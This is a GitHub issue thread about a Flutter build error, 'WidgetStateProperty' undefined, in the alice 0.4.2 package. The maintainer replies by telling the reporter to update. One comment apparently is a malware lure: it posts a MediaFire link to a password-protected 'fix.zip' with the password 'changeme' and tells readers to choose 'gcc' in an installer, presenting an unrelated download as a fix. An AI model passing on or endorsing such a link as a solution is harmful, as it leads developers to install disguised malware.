### ISSUE TITLE
[BUG] The getter 'WidgetStateProperty' isn't defined for the class '_AliceCallResponseWidgetState'.

### ISSUE THREAD

**Issue by BenzDroid** [jhomlala/alice#231]
**Describe the bug**
../../.pub-cache/hosted/pub.dev/alice-0.4.2/lib/ui/widget/alice_call_response_widget.dart:167:19: Error: The getter 'WidgetStateProperty' isn't defined for the class '_AliceCallResponseWidgetState'.
 - '_AliceCallResponseWidgetState' is from 'package:alice/ui/widget/alice_call_response_widget.dart' ('../../.pub-cache/hosted/pub.dev/alice-0.4.2/lib/ui/widget/alice_call_response_widget.dart').
Try correcting the name to the name of an existing getter, or defining a getter or field named 'WidgetStateProperty'.
                  WidgetStateProperty.all<Color>(AliceConstants.lightRed),
                  ^^^^^^^^^^^^^^^^^^^
../../.pub-cache/hosted/pub.dev/alice-0.4.2/lib/ui/widget/alice_call_response_widget.dart:238:19: Error: The getter 'WidgetStateProperty' isn't defined for the class '_AliceCallResponseWidgetState'.
 - '_AliceCallResponseWidgetState' is from 'package:alice/ui/widget/alice_call_response_widget.dart' ('../../.pub-cache/hosted/pub.dev/alice-0.4.2/lib/ui/widget/alice_call_response_widget.dart').
Try correcting the name to the name of an existing getter, or defining a getter or field named 'WidgetStateProperty'.
                  WidgetStateProperty.all<Color>(AliceConstants.lightRed),
                  ^^^^^^^^^^^^^^^^^^^
Target kernel_snapshot failed: Exception

**Flutter doctor**
Flutter version 3.19.0
Dart version 3.3.0
DevTools version 2.31.1

**Alice version**
- Version: 0.4.2

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jhomlala** [comment]
Please update to latest release.
